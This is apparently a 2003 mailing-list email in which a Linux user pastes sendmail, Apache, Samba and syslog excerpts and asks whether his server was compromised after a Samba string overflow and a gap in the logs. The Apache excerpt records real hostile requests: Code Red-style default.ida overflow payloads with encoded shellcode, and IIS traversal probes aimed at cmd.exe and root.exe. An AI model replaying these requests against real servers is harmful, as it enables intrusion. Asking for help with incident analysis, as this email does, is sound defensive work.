Thanks for all the replies.
This email contains snips of my log files. There is some interesting reading, particularly the messages log. It seems a samba string overflow cause some problems from April 21 to 29 - scroll down to see the logs. Does this mean that a hacker has gotten control of my box?
In a number of replies people talk about a cracker, eh, what is a cracker? And what is the different with a hacker?
From: "Derek Fountain"
Do you have any reason to believe a hardware fault has occured? Any history of
overheating with that box? Has it received a knock recently which might have
dislodged some memory? Any reason to think the hard disk might have started
to die?
I have no reason whatsoever to suspect a hardware problem. No knocks, overheating etc.
A reinstall looks like the best option in the absence of any better advice. My
suspicions would lay with the hardware though. Happily running Linux boxes
don't just go belly up like that without a good reason.
I think that I will reinstall the machine.
Rohit writes:
I would have looked at /var/log/ directory and in relevant files there.
Thanks for this, would you suggest which file I should look at?
I looked at my mail log and guess what?
There is a huge whole in the log, everything from April 21 to 29 is gone.
Mail was running during that time.
Apparently deleted (???). Here is a snip of the log:
[snip]
Apr 21 18:00:34 linux sendmail[6307]: h3LG0Yd3006306: to=, ctladdr= (0/0), delay=00:00:00, xdelay=00:00:00, mailer=local, pri=31120, dsn=2.0.0, stat=Sent
Apr 29 09:50:09 linux sendmail-client[1040]: starting daemon (8.12.3): queueing@00:30:00
[/snip]
No data seems to be missing from the apache access log on April 21 6pm - but there seems to be some kind of hacking attempt at that time.
Here is a snip of that log:
[snip]
80.235.135.50 - - [21/Apr/2003:16:32:22 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
208.25.133.10 - - [21/Apr/2003:17:43:13 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:55 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:02 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
193.109.122.5 - - [21/Apr/2003:18:51:24 +0200] "CONNECT 193.109.122.7:2048/ HTTP/1.1" 400 340
80.224.123.79 - - [21/Apr/2003:20:40:23 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:21 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.201.159.40 - - [21/Apr/2003:21:52:29 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
80.62.154.229 - - [21/Apr/2003:22:38:13 +0200] "GET /personal/ HTTP/1.1" 401 477
[/snip]
Here is a snip from the samba log file (log.smbd) .
I don't understand all of this but there was activity on April 21 around 18pm
I don't recognise these ip addresses.
[snip]
[2003/04/21 18:04:16, 0] smbd/service.c:make_connection(249)
localhost (200.67.132.3) couldn't find service c
[2003/04/21 18:04:30, 0] smbd/service.c:make_connection(249)
localhost (80.24.226.55) couldn't find service c
[2003/04/21 18:18:39, 0] smbd/service.c:make_connection(249)
alevrius_ (200.56.254.70) couldn't find service c
[2003/04/21 18:20:24, 0] smbd/service.c:make_connection(249)
50163099sp (67.225.191.11) couldn't find service c
[2003/04/21 18:29:04, 0] smbd/service.c:make_connection(249)
50163099sp (62.56.130.23) couldn't find service c
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6353 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6354 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6355 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6356 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:18, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6360 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:18, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6371 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6373 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:52:16, 0] smbd/service.c:make_connection(249)
localhost (61.217.123.231) couldn't find service c
[/snip]
More log reading, this time messages - this log shuts down April 21 and starts up April 29 - a samba string overflow seems to have caused a shut down.
[snip]
Apr 21 18:44:20 linux smbd[6373]: ===============================================================
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
Apr 21 18:44:20 linux smbd[6373]: INTERNAL ERROR: Signal 11 in pid 6373 (2.2.3a)
Apr 21 18:44:20 linux smbd[6373]: Please read the file BUGS.txt in the distribution
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
Apr 21 18:44:20 linux smbd[6373]: ===============================================================
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
Apr 21 18:44:20 linux smbd[6373]: PANIC: internal error
Apr 21 18:44:20 linux smbd[6373]:
Apr 21 18:44:20 linux smbd[6374]: [2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
Apr 21 18:44:20 linux smbd[6374]: ERROR: string overflow by 949 in safe_strcpy [\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220]
Apr 21 18:44:20 linux smbd[6374]: [2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
Apr 21 18:44:20 linux smbd[6374]: ERROR: string overflow by 949 in safe_strcpy [\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220]
Apr 29 09:46:25 linux syslogd 1.3-0: restart.
Apr 29 09:46:36 linux sshd[844]: Server listening on :: port 22.
Apr 29 09:46:37 linux webmin[843]: Webmin starting
Apr 29 09:46:44 linux /etc/hotplug/net.agent[846]: No HW description found ... exiting
Apr 29 09:50:08 linux init: Switching to runlevel: 6
Apr 29 09:50:09 linux /usr/sbin/cron[1029]: (CRON) STARTUP (fork ok)
Apr 29 09:52:30 linux syslogd 1.3-0: restart.
Apr 29 09:52:41 linux sshd[843]: Server listening on :: port 22.
Apr 29 09:52:43 linux webmin[842]: Webmin starting
[/snip]
Thanks in advance for any advice.
Dan